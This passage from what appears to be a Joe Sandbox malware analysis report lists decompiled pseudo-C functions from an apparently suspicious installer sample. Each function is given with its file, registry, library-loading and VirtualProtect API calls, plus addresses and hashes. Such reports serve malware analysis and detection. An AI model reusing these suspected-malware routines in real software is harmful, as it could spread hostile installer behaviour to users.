					if( *0x6f3d5050 != 0 && E6F3D2ADB( *0x6f3d5058) == 0) {
						 *0x6f3d504c = _t94;
						_t94 =  *0x6f3d5054;
					}
					_t80 =  *0x6f3d5058;
					_a4 = _t80;
					 *0x6f3d5058 =  *((intOrPtr*)(E6F3D2AFD() + _t80));
					_t37 = E6F3D2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E6F3D2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6F3D2B14() + _a4 + _v8);
							_push(E6F3D2B1E());
							if( *0x6f3d5050 <= 0 || E6F3D2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x6f3d504c =  *0x6f3d504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x6f3d5058;
					if( *0x6f3d5058 == 0) {
						 *0x6f3d504c = 0;
					}
					E6F3D2B42(_t107, _a4,  *0x6f3d5034,  *0x6f3d5038);
					return _a4;
				}
				_push(E6F3D2B14() + _a4);
				_t56 = E6F3D2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E6F3D2B26();
				_t87 = E6F3D2B22();
				_t90 = E6F3D2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6f3d2ba8
0x6f3d2bb9
0x6f3d2bc6
0x6f3d2bda
0x6f3d2bc8
0x6f3d2bcd
0x6f3d2bd2
0x6f3d2bd2
0x6f3d2bc6
0x6f3d2be3
0x6f3d2be8
0x6f3d2bee
0x6f3d2c32
0x6f3d2c32
0x6f3d2c37
0x6f3d2c3c
0x6f3d2c42
0x6f3d2c44
0x6f3d2c4a
0x6f3d2c57
0x6f3d2c59
0x6f3d2c5e
0x6f3d2c6b
0x6f3d2c7e
0x6f3d2c84
0x6f3d2c8a
0x6f3d2c8b
0x6f3d2c91
0x6f3d2c9d
0x6f3d2ca3
0x6f3d2cab
0x6f3d2cac
0x6f3d2caf
0x6f3d2cba
0x6f3d2cbc
0x6f3d2cc8
0x6f3d2cce
0x6f3d2cd6
0x6f3d2d02
0x6f3d2d03
0x6f3d2d05
0x6f3d2d09
0x6f3d2d09
0x6f3d2d10
0x6f3d2ce6
0x6f3d2ce6
0x6f3d2ce7
0x6f3d2cf5
0x6f3d2cfe
0x6f3d2cfe
0x6f3d2cd6
0x6f3d2cba
0x6f3d2d12
0x6f3d2d19
0x6f3d2d1b
0x6f3d2d1b
0x6f3d2d34
0x6f3d2d42
0x6f3d2d42
0x6f3d2bf9
0x6f3d2bfa
0x6f3d2bff
0x6f3d2c03
0x6f3d2c08
0x6f3d2c1c
0x6f3d2c1d
0x6f3d2c1e
0x6f3d2c20
0x6f3d2c25
0x6f3d2c27
0x6f3d2c27
0x6f3d2c2a
0x6f3d2c30
0x00000000

APIs

CreateFileA.KERNELBASE(00000000), ref: 6F3D2C57

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cb2a880254f1ed85b0a94841e03af697186d26940bec7668b32db2ccb9cb02ae
Instruction ID: 9c746983f377371c00a0d0af888128eab5789d3adb7c6854f0a304ba9310ac1f
Opcode Fuzzy Hash: cb2a880254f1ed85b0a94841e03af697186d26940bec7668b32db2ccb9cb02ae
Instruction Fuzzy Hash: 22419DB39047049FDF159F68DB80B493778EB45369F20842AF8048B190DB39E8A48BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A23018 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,50015455), ref: 02A231F6

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5d480cacd140e09223179e0c49506e10997b09c73aeeb315c81f55762959c50c
Instruction ID: 01cbbf1d937684ca509445722467018ead4dff3dcb97f02afc10609302e2bab9
Opcode Fuzzy Hash: 5d480cacd140e09223179e0c49506e10997b09c73aeeb315c81f55762959c50c
Instruction Fuzzy Hash: E22102B6A09355CFCB34AE689D243FAB6F2AF9A750F82002ECDCA67141D7344981CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A2392F Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0c45de62f6d2cdf3130408c2e4646a1cef3a5404b46f55885a51d9d9414602a5
Instruction ID: aea08f8e02d0d076a67c32a2969389aa79affd3488b2c183cbe7720f945173f0
Opcode Fuzzy Hash: 0c45de62f6d2cdf3130408c2e4646a1cef3a5404b46f55885a51d9d9414602a5
Instruction Fuzzy Hash: 8911A775A443599FDF30EE2889653DE37B79F663A0FD08125DC588B148DB364A8ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402DA6(0xffffffd0);
				_t16 = E00402DA6(0xffffffdf);
				E00402DA6(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E00406873(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004062FD(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x0040292e
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x004022f1
0x004022f1
0x004022f1
0x00402c2d
0x00402c39

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
Opcode Fuzzy Hash: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063e2
0x004063eb
0x00406401
0x00000000
0x00406401
0x004063ef
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D2A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6f3d5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6f3d505c, 4, 0x40, 0x6f3d504c); // executed
					 *0x6f3d505c = 0xc2;
					 *0x6f3d504c = 0;
					 *0x6f3d5054 = 0;
					 *0x6f3d5068 = 0;
					 *0x6f3d5058 = 0;
					 *0x6f3d5050 = 0;
					 *0x6f3d5060 = 0;
					 *0x6f3d505e = 0;
				}
				return 1;
			}

0x6f3d2a88
0x6f3d2a8d
0x6f3d2a9d
0x6f3d2aa5
0x6f3d2aac
0x6f3d2ab1
0x6f3d2ab6
0x6f3d2abb
0x6f3d2ac0
0x6f3d2ac5
0x6f3d2aca
0x6f3d2aca
0x6f3d2ad2

APIs

VirtualProtect.KERNELBASE(6F3D505C,00000004,00000040,6F3D504C), ref: 6F3D2A9D

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e7a75023ad891b315f356df66ceef12f3eae6dc9afc7df4343e049a1bfab1d16
Instruction ID: 80d7b3903225eba6b24bd7eb96c8956101a02e8c04bf2b6c1fc540cf411fc701
Opcode Fuzzy Hash: e7a75023ad891b315f356df66ceef12f3eae6dc9afc7df4343e049a1bfab1d16
Instruction Fuzzy Hash: BFF0C2F1905B80DECBD0CF3C84447093FE8FB0B326B54852EE288D6240E3344064DB95

Uniqueness

Uniqueness Score: -1.00%

Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063b4
0x004063bb
0x004063ce
0x00000000
0x004063ce
0x004063bf
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 30328d7073751e656d59c65da3bf6c6accfc47a5a9bf7eee50ca0d6ba827389c
Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
Opcode Fuzzy Hash: 30328d7073751e656d59c65da3bf6c6accfc47a5a9bf7eee50ca0d6ba827389c
Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0x103dc
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(000103DC,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
